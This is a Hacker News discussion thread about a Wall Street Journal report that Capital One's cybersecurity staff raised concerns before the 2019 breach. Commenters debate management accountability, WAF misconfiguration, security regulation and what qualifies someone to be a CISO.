Hacker News new | past | comments | ask | show | jobs | submit login
Capital One Cyber Staff Raised Concerns Before Hack (wsj.com)
141 points by valiant-comma on Aug 16, 2019 | hide | past | favorite | 66 comments



Not discounting this story, but I’d like to point out that raising concerns is a personal protective strategy for any cyber staff. If you constantly raise concerns that you know cannot or will not be resolved, you have created a paper trail scapegoat for when something goes wrong. The more ambiguous the better: firewall settings not monitored enough, Too much turnover something will fall through cracks, Etc

Protecting a large enterprise from cyber attacks is basically impossible, so coping with that stress and protecting your career by looking for other things to blame makes sense to me.


That is an unfair blow. What can you do as an individual in an organization that does not value security and sees it as a sunken cost? I found myself in that position multiple times and I am a sysadmin not security guy. I have no formal responsability in that position and no incentive for covering my ass. But I still have fights with management about it.


IMHE Cap One took security very seriously although security expertise was not diffuse.

Frankly I’m surprised their policy enforcement measures didn’t catch the misconfigured app.


you don't, except to cover your ass. And so the problem remains unsolved. The law, and regulation, needs to step in.

It should be as frowned upon by the law as a restaurant not meeting sanitation requirements.


> you don't, except to cover your ass.

You might want to read my reply once more.

> And so the problem remains unsolved.

Why do you talk about things you don't know? I've scored multiple victories on that front.

> The law, and regulation, needs to step in.

I work in PCI environments. The regulations are there but few companies follow them except on paper to cover their ass. Regulations are not the solution. People are. We need to fight.


PCI regulations are weak and do little to cover the majority of threats.


> Protecting a large enterprise from cyber attacks is basically impossible

But protecting it from easily preventable cyber attacks "of opportunity" is perfectly possible if you have capable management. They are responsible with building a team of good engineers, trusting them when they raise concerns, and acting on those concerns. Of course for mediocre management teams who are unable to do any of the above this is always a CYA exercise. When you're the person with the budget and the decision power you need to come up with solutions not excuses. This is not a "falling through the cracks" situation. This is a "let's put a tarp instead of a door and hope nobody will notice".

Ensuring the physical security of a large enterprise 100% of the time is basically impossible but if someone just walks in by your security staff in the middle of the day and walks out with a rack from the DC then you have a management problem.


I am becoming certain that every company will get penetrated at some point. E.g. a poorly configured WordPress box... What happens next is what matters. Least privilege, prevent east west movement, logging aggregation with anomaly detection, notice data exfil, etc. Defense in depth is what matters.


I’m discounting the story. Some of the complaints are ridiculous. ‘Too many different languages’?


For an appsec team to have a chance in hell they need to be able to understand the application code, no?

This seems like a reasonable complaint given that it’s a problem for polyglot dev teams.


> For an appsec team to have a chance in hell they need to be able to understand the application code, no?

No, especially for networked services.

There is a lot of homework that has to happen for security teams to even begin to look into the actual source code.

What you need to learn is how the application interacts with the outside world and how to secure those mechanisms. It can be a black box – and for the most part it should, otherwise you'll be bogged down in minutia while there are big holes waiting to be plugged.

What you may need to understand in more depth is the protocols in use and access controls. But again, the programming language or the exact code matters little. Even if you have to do stuff like correctness proofs, congratulations! You are now part of the development team. Now you need to add security folks to look into the big picture again.


Technically if addressing the flaws that deep can be valid. But this was major low hanging fruit - not having proper protection on their cloud servers was what made this breach and that is a config not a language issue on the technical end. On the management end it is an issue of utter user technical incompetence.


diversity of code base is a strength, except to vendors and pointy-haired ones


Let me help. In the first paragraph it says

> and a failure to promptly install some software to help spot and defend against hacks

so against your "cannot or will not be resolved" you have actual software being actually not installed (and that's on top of other bad smells at the company listed in the article).

> Protecting a large enterprise from cyber attacks is basically impossible

Absolute garbage. You seem to be confused about 'protecting against' vs 'making invulnerable'. An you profile actually claims you have "Fintech CTO background [...] including risk analysis" - honestly what on earth made you post such a thing?


To be fair, this could go either way.

Some Cyber Sec professionals are all about the products, but often it's just a barrage of random crap that doesn't really do anything and no strategic planning used in an attempt to paper over the fact they have no skills in the area they're buying for.

Sometimes it's easier to just install it, but engineering budget _is_ a zero sum game, so wasting time adding random binaries, that sometimes actually increase risk, is something you can see being ignored.

Further, the specific attack didn't require any more monitoring tools that were already claimed to have been configured. They just weren't using them properly.

P.S. Given there was a high churn in InfoSec staff, I could totally imagine them all asking for their pet products and then raising concerns when they don't get it. This is typical in dysfunctional orgs.


This article is devoid of any meaningful analysis and perspective.

>The cybersecurity unit—responsible for ensuring Capital One’s firewalls were properly configured and scanning the internet for evidence of a data breach—has cycled through senior leaders and staffers in recent years, according to the people.

Firewall team combined with threat-intel? I'm not sure what that has to do with the breach, or preventing it.

>Sometimes the broader tech-centric culture of the firm could complicate security, the people said. Technology employees had at times been given free rein to write in many coding languages—so many that it made it harder for the cybersecurity unit to spot problems, according to people familiar with the matter.

Super common, but coding languages aren't generally acknowledged as responsible for the hack. If there was a code level vulnerability that most likely would have been caught by static analysis, but wasn't because their scanning tools didn't support a language, this comment would make more sense.

>the alleged hacker found that a computer managing communications between the company’s cloud and the public internet was misconfigured—effectively it had weak security settings, the Journal previously reported.

Server Side Request Forgery, coupled with overpermissioning, could be explained this way - misconfigured WAF. A poor description of the what we think may be the actual exploit.

It goes on and on.


In the olden days, you could sum up the entire information security knowledge and posture of many companies with "we're behind a firewall, so everything is fine".

Some companies have not evolved much beyond this attitude, and it shows with ridiculous wording like this.


In the real olden days (mid 90's), we had entire offices with public IP addresses and no firewalls!


I have experience with these type of environments.

When you allow people to code in different languages and different environments, everyone has different needs.

They need different software, which often connects to different network resources. You get endless incidents where users can't program because they can't download a plugin, or their software needs libraries found on the internet, and if the network group is being lazy they could end up opening up more to the internet than they should, because it's too much work to accommodate everyone when there are no standards.

Network openings like these scenarios create are enough to infiltrate a company if someone does something as innocuous as clicking a random link on google with a vulnerable browser.


Upon re-read, I don't mentally equate WAF (which is related to the breach, with Firewalls. In my mind, they are two completely different controls. However, I'm not sure if that's a pervasive perspective or just my own. Therefore, my aforementioned statement about firewalls may or may not be valid. YMMV.


? WAF stands for web application firewall... You don't equate a WAF with a hardware firewall? Just not understanding...


The reporter said Firewall. When I read that, I don't think of a WAF, rather a more traditional firewall that separates internet from intranet. If others, including the reporter, generally think of WAFs when they read firewall, then my criticism on this particular point is unfair.

For example, if someone listed 2 years of experience with firewall rules, I'd automatically think routing and not WAF rules configuration.


Managment just does basic risk assessment: pay a few million here or there for a fine doesn't really impact business continuity - so security is not important at all. That's the reality.

For profit companies are often quite unethical. Laws that put executives in jail if they do not perform basic due diligence might help, e.g. proof a security program is established and executed on, to ensure their own defined standards and policies are met. There are quite a few CSO/CISOs from breached companies who should not be allowed to continue performing their profession.

Startups are often perfectly falling into this bucket unfortunately. As soon as one has more then a certain amount of customers, stakes should become extremely high.


> For profit companies are often quite unethical.

this is why i m an advocate of making the law === to ethics. The reason a company is unethical is because those that are ethical are punished by the market (as an unethical, but completely law abiding company can outcompete them by virtue of having less costs involved).


This is difficult because not everyone believes in the same ethics or follows the same laws. I think it's best to not assume my ethics are somehow more or less valid than anyone else's.

That said, I definitely agree that the law needs to change for these situations. It's tricky though, because the entire reason people create corporations is to avoid personal responsibility for their actions.


There is a great new book describing ethical and moral stances and how one goes from moral absolutism to decency called “A Decent Life” by Todd May.

Also, corporations allow you to avoid personal financial liability but not personal responsibility.... society and community still holds people accountable for social violations. People are also still accountable for criminal activity.


>I think it's best to not assume my ethics are somehow more or less valid than anyone else's.

That violates the law of non-contradiction. Either one is wrong and one is right, or both people are wrong and they haven't realized what is right yet. Moral subjectivism as a principle makes absolutely no sense, and Aristotle destroyed that argument in Nichomachean Ethics.


I simply meant that when I am initially appalled by someone else's behavior it is usually more useful to try to understand their point of view than it is to demonize them. I also try to remind myself that I always have room for improvement. Of course there are plenty of times where I can't excuse or even understand the bad actions of others. I'm just wary of anyone treating their personal morals as absolute.


Are you trolling? I can't tell.


No. People just have no concept of objective morality today because everyone is hyper-sensitive to everything and can't take criticism at all.


what does it even mean for a moral system to be "right" or "wrong"? it's not like they have any predictive power.


I think the problem with this is that there will always be "unethical" ways to work around the legal system. In fact, having more laws can make this easier and more obscure.


This would be incredible, but generally deregulation is eschewed by the elite. Speed limits for instance serve no purpose in nearly every case except to raise revenue.


speed limits serve a very important purpose. set them so that most people will speed and now you can pull any of them over at any time.


exactly what the parent comment was getting at. the main reason to pull someone over for speeding is to issue a ticket to generate revenue.


most often, yes, it is just to raise revenue. but it also creates an opportunity to sidestep some of the protections that a driver should enjoy. technically, a police officer cannot pull you over without cause, but unreasonable traffic laws essentially create a cause to pull anyone over.

I don't disagree with GP, just pointing out that it's a bit more sinister than just writing tickets. many situations where police abuse their power and/or use excessive force begin with a legal traffic stop.


The law profession has the bar and licensing that requires you to be licensed to practice law.

Why can't we have something similar for such professions?


Because thats fundamentally not the problem. At every company I've worked at, the senior engineers could tell you exactly how they were skimping on security, why its bad, and how to fix it.

The problem isn't lack of knowledge or skill, it is that management refuses to commit the resources necessary to build secure products. When the difference between building secure X and not-secure X is often 2-3 times the effort and time commitment, managers will almost always pick not-secure X and roll the dice on nothing going wrong.

From their point of view, adding security does nothing for the product. The customers are paying for the value-prop and marginal improvements on it, not the integrity of the backend.

If you want to solve the problem of lax security, you need to make security breaches a buisness-ending proposition. You also need to increase the likelyhood of being compromised so that people aren't tempted to roll the dice. If you want regulation, I would support some kind of white hat law that says if you compromise sensitive company data, the corporation has to (1) pay an amazon-bankrupting amount of money and (2) they have to give 20% of it to the team that broke them.


> pay an amazon-bankrupting amount of money

I'd love to see this even though I know it won't happen but I want to go through a mental exercise:

(Off-topic but) where does this money go to? I think about things like traffic tickets or any other fee or fine and I can't think of anything that's any good. If it goes to anything that taxes would go toward, it will cause pressure to decrease taxes and make our governments dependent on this income.

Is there any good answer to this? Prison for the CEO and the board seems much easier in comparison.


I can see that if the intent was malicious. (Like executives made a trade-off that it was totally fine to lose insurance money to pay out in case of a breach, vs hire a security team).

But if it is the more normal circumstance (some vulnerability in the 30 libraries you use, led to the breach), there should absolutely be a monetary punishment but jail time seems too much.


Hiring great people and getting out of their way is only one of three table legs. The other two are listening when they advise you, and empowering them to effect change.


Even if you know that your company is doing nothing to find exposed secrets on the web, can a single engineer just tell their manager, "Hey, you know what? I'm not going to work on this work you assigned me, I'm going to work on this other thing which might be beneficial down the road."

Somebody has to groom the "concern" into a story that can be worked on, then assign it to someone. But often this kind of work will get passed over by a manager or team that would rather work on something else, or doesn't see it as important. If you have high turnover, that makes addressing "concerns" all the more difficult, as people aren't around long enough to coordinate working on them.

So just "raising concerns" is not going to change anything; somebody at the top has to be listening for them, and somebody in the middle needs to be tracking getting them resolved.


To this day I still receive emails for another person with my name through cap one 360. Some were regarding overdue bills, and with others some personal information was given. I called repeatedly... and nothing was ever done about it. I think they poorly merged account data at one point - perhaps it’s a broader reflection of their IT work.


"9 people 6 months to do"

That sounds to me like they had decided that they, for whatever reason, didn't want to do the work.


How about introducing the following law: If an employee is aware of a breach in their company systems and they use the said breach to enrich themselves - they are protected by law against all prosecution related to the said malicious action.


We made an interactive demo to show how the hacker exploited the vulnerability https://application.security


well, looks like they caught him. /s

What a one-sided hit piece.


https://www.linkedin.com/in/michael-johnson-098437117/

They hired a bureaucrat, not an engineer, to be their CISO.


Hiring an engineer (and by that I assume you mean someone who has the bulk of their experience as a software engineer) as CISO is exactly the opposite of what a company should do. Security is absolutely not the same skill set as software engineering, and it's a huge misconception that people equate infosec with programming. Security engineers of course should be programmers, but an enormous amount of work that goes into infosec has absolutely nothing to do with code, and this is especially true for someone high up in management ranks like a CISO where their entire job is dealing with bureaucracy.

Hiring an engineer to be a CISO would be like choosing a biologist to give you surgery instead of a surgeon. Yes, a biologist probably knows a lot about the nitty-gritty of how bodies work, but knowing how the body works and knowing how to perform surgery on a body are two very, very different things.

That guy's LinkedIn looks more than qualified to be a CISO, and is certainly more qualified than the vast majority of CISOs I worked with in my career as a security consultant. And on top of all that, he has a degree in computer engineering and has prior experience as an engineer, so I have no idea why you're claiming he isn't an engineer.


It's difficult because the CISO runs the budget, and a non-technical CISO, in my experience, is much more likely to buy products and not hire people needed to use them.

Think about it this way: publications are telling you that ~92% of Cyber attacks start from an end users device. Probably true, but are we talking about a device being owned here or just are we discussing actual PII data loss?

More importantly, whilst Gartner and co is telling you what products you need to buy to defend against this, what they aren't telling you is the best product only has a 52% attack detection rate. And this only accounts for known attack vectors.

So you're a CISO, you're 15 million down on products, 5 million down on risk people, without a Software Developer, Sysadmin or Release Engineer on your team. The actual Engineering team ignores you because you keep raising stupid concerns.

Would this have happened if you were technical? Maybe, you'd have a different set of problems.


I see where you’re coming from but this is not far off the thinking that “an MBA can manage anything”.

To use your analogy no surgeon is allowed to cut until he or she does have a solid grounding in biology.


You're right, that wasn't a very good analogy. My point is not to say that a CISO/surgeon shouldn't have any experience in engineering/biology (in fact, as you pointed out, it is the opposite! you ideally want a CISO with some technical chops just as you want a surgeon with some biology knowledge). My point is that there is much more to being a CISO than just technical knowledge.

Maybe a better analogy would be choosing someone to represent you in a lawsuit about programming patents. You would want a lawyer representing you, not a programmer. Ideally the lawyer would have some previous experience with these kinds of cases and would lean on programming experts for their knowledge. Maybe they are even a former programmer turned lawyer! But I certainly wouldn't hire "a programmer" to represent me no matter how experienced in programming they are. Linus Torvalds would be a great expert witness, but he isn't going to be my general counsel.


I would say the lawsuit example isn't great, lawyer is a specialized profession unto itself. Management has it's own vagaries, but I think it's easier for the right kind of engineer to get into management rather than a lifelong manager to gain competence in engineering and that was the original point. Having someone with no background in engineering running a department is suspect.


There's still a disconnect here. Infosec is a specialized profession unto itself, too. A CISO is not just "an engineer that's gone into management". My original point is that security is so far removed from "engineering" that it's incorrect to equate the two (even though it's done all the time).

>I think it's easier for the right kind of engineer to get into management rather than a lifelong manager to gain competence in engineering

IME, it's the opposite. It depends on your specific goal (are we trying to train someone to be CISO or are we training them to be a SOC team leader?), but it's ridiculously easier (and more effective) to take a person with existing management abilities and teach them about security than it is to take an engineer and teach them security management skills.

>Having someone with no background in engineering running a department is suspect.

It's really not, because again, engineering != security. It's no more suspect than the CFO not having a background in engineering.


To use your analogy no surgeon is allowed to cut until he or she does have a solid grounding in biology.

I take it you're unfamiliar with the content of the MCAT exam, which is a prerequisite to admission to American medical schools.


Sounds like they hired a CISO with a toxic personality more interested in internal PR than security, and all the talent ran off. Sounds like this is the exact opposite of what any company should do.


not sure a biologist knows more about the body than a surgeon. isn't it more like asking a surgeon to run the department?


This is an extreme manipulation of the facts. He has an M.Sc in Computer Science, did R&D at Hewlett-Packard during their golden age, and then spent 22 years at Sandia.

This guy was only a bureaucrat in the thinnest interpretation of the word.


He worked at Sandia so he seems to have engineering chops. But it is ridiculous to think that one individual or even one isolated group can defend against pervasive threats. Like worker safety, it has to be a cultural priority starting at the top and made priority #1 in every decision and work process.

Even then, security is an illusion. Eventually something or someone will find a way to get through. Zero trust needs to be embraced. Assume every employee, partner, developer and vendor is going to have full internal access and abuse it...then defend from there.


What according to you is a qualification to be a CISO, of a bank or a financial institution?

I would any day put my money in a bank who has a CISO with such credentials as that of Michael Johnson. He has been an engineer, done R&D, does have the right chops too I guess. And CyberSec has multiple layers - mostly the people, which is the weakest one. And that, my friend, cannot really be solved just by tech.


Whatever he was, if the article is to be believed, it seems like his poor management caused the problem. I believe it. This is often the case, where managers actively interfere with priorities that the engineers try to provide. Not only that but he was using resources to play politics.

The issue is that fundamentally that's what managers and executives do. Their profession is politicking and manipulation rather than solving problems.



Sounds like they hired an Olympian


I think someone is trying to cover their ass. Think about how this story could have been written: the WSJ reaches out to current and former employees and writes what they say. Those cyber security employees are already feeling the heat and want to preserve their reputation, so they throw someone else under the bus.

This was an inside hack by a former AWS employee. It was difficult to protect against. I can't fault Capital One here as much as I can fault AWS.

There will always be tension between the Security team and the rest of the company.


> former AWS employee

I've yet to see anything that would imply that being an ex employee helped. It seemed that she used a "public" attack vector.


She was a AWS insider. Aware of the common env configurations should have in place and aware that Capital had a few places to poke here and there.

I hardly call this a hack. This is more a cake recipe she followed thanks to working directly on AWS and being a crook.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: